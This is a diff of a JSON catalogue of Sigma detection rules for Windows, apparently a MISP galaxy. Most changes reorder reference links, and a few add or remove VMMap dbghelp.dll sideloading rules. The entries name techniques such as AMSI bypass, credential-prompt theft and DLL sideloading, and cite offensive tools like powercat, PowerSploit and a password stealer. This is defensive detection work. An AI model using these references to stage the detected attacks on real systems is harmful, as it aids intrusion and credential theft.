"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://bunnyinside.com/?term=f71e8cb9c76a", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ @@ -22820,9 +23142,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ @@ -22855,8 +23177,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" ], "tags": [ @@ -22922,9 +23244,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], "tags": [ @@ -22957,8 +23279,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" ], "tags": [ @@ -22991,10 +23313,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", - "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://persistence-info.github.io/Data/ifilters.html", "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ @@ -23050,8 +23372,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" ], "tags": [ @@ -23110,9 +23432,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" ], "tags": [ @@ -23147,9 +23469,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", - "https://twitter.com/dez_/status/986614411711442944", "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://twitter.com/dez_/status/986614411711442944", + "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ @@ -23386,8 +23708,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_svchost_dlls.yml" ], "tags": [ @@ -23430,8 +23752,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" ], @@ -23511,10 +23833,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", - "https://twitter.com/chadtilbury/status/1275851297770610688", "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ @@ -23752,9 +24074,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", - "https://github.com/S12cybersecurity/RDPCredentialStealer", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/S12cybersecurity/RDPCredentialStealer", + "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_credui_uncommon_process_load.yml" ], "tags": [ @@ -23788,8 +24110,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" ], "tags": [ @@ -24025,8 +24347,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_drawing_load.yml" ], "tags": [ @@ -24059,9 +24381,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://github.com/TheD1rkMtr/AMSI_patch", "https://github.com/surya-dev-singh/AmsiBypass-OpenSession", "https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9", - "https://github.com/TheD1rkMtr/AMSI_patch", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_uncommon_process.yml" ], "tags": [ @@ -24255,11 +24577,11 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], @@ -24346,8 +24668,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "Internal Research", + "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" ], "tags": [ @@ -24518,6 +24840,49 @@ "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "value": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE" }, + { + "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_vmmap_dbghelp_signed.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "related": [ + { + "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", + "value": "VMMap Signed Dbghelp.DLL Potential Sideloading" + }, { "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.)", "meta": { @@ -24531,10 +24896,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://hijacklibs.net/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -24577,8 +24942,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", + "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" ], "tags": [ @@ -24611,8 +24976,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/am0nsec/status/1412232114980982787", "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" ], "tags": [ @@ -24840,49 +25205,6 @@ "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "value": "Potential Antivirus Software DLL Sideloading" }, - { - "description": "Detects potential DLL sideloading of dbghelp.dll by the Sysinternals VMMap.", - "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2023/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_vmmap_dbghelp.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "related": [ - { - "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", - "value": "VMMap Dbghelp.DLL Potential Sideloading" - }, { "description": "Detects any assembly DLL being loaded by an Office Product", "meta": { @@ -24972,8 +25294,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", + "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" ], "tags": [ @@ -25232,10 +25554,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://thewover.github.io/Introducing-Donut/", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/tyranid/DotNetToJScript", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://thewover.github.io/Introducing-Donut/", + "https://github.com/tyranid/DotNetToJScript", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ @@ -25256,6 +25578,49 @@ "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", "value": "DotNet CLR DLL Loaded By Scripting Applications" }, + { + "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_vmmap_dbghelp_unsigned.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "related": [ + { + "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", + "value": "VMMap Unsigned Dbghelp.DLL Potential Sideloading" + }, { "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "meta": { @@ -25345,9 +25710,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml" ], "tags": [ @@ -25380,9 +25745,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", - "https://twitter.com/WhichbufferArda/status/1658829954182774784", "https://securelist.com/apt-luminousmoth/103332/", + "https://twitter.com/WhichbufferArda/status/1658829954182774784", + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml" ], "tags": [ @@ -25545,8 +25910,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://twitter.com/StopMalvertisin/status/1648604148848549888", + "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://www.roboform.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml" ], @@ -25688,8 +26053,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html", + "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml" ], "tags": [ @@ -26466,9 +26831,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/oulusoyum/status/1191329746069655553", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" ], "tags": [ @@ -26585,8 +26950,8 @@ "logsource.product": "windows", "refs": [ "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -26619,9 +26984,9 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://nmap.org/ncat/", "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ @@ -26654,9 +27019,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -26876,8 +27241,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ @@ -27219,9 +27584,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -27254,9 +27619,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/ADModule", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", + "https://github.com/samratashok/ADModule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" ], "tags": [ @@ -27608,24 +27973,24 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/ADRecon", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://adsecurity.org/?p=2921", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/AzureADRecon", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/adrecon/ADRecon", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://adsecurity.org/?p=2921", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" ], "tags": [ @@ -27990,23 +28355,23 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/HarmJ0y/DAMP", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/samratashok/nishang", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/NetSPI/PowerUpSQL", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/PowerShellMafia/PowerSploit", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" ], "tags": [ @@ -28429,8 +28794,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", 